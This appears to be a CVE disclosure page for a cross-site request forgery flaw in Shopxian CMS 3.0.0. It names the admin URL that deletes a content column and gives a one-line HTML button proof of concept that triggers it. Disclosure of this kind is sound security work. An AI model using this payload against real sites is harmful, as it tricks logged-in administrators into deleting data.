Headline
CVE-2022-38329: CVE-Issues/file.md at main · albert5888/CVE-Issues
An issue was discovered in Shopxian CMS 3.0.0. There is a CSRF vulnerability that can delete the specified column via index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17.
Permalink
Cannot retrieve contributors at this time
Cross-site request forgery exists in shopxian_cms
vendor:https://github.com/zhangqiquan/shopxian_cms
download link:https://github.com/zhangqiquan/shopxian_cms.git
Vulnerability details: When the administrator logs in, click the button will delete the specified column.
Vulnerability POC:
<input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>
CSRF HTML:
open the html and click the button
Successfully deleted